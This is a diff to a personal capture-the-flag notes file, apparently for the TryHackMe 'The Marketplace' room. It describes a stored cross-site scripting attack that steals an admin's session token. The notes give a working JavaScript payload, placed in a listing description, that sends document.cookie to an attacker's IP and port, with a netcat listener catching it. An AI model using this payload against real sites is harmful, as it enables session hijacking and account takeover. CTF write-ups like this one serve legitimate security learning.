wither/Notes/thm/the-marketplace/README.md

 ## Steal admin token

-> Make a new listing, change the description to the script, open a netcan listener and then report the listing to the admins
+> Make a `new listing`, change the `description` to the script, open a netcat listener and then `report` the listing to the admins
 ```JavaScript
 <script>new Image().src="http://10.11.19.194:1337/cookie.php?output="+document.cookie;</script>
 ```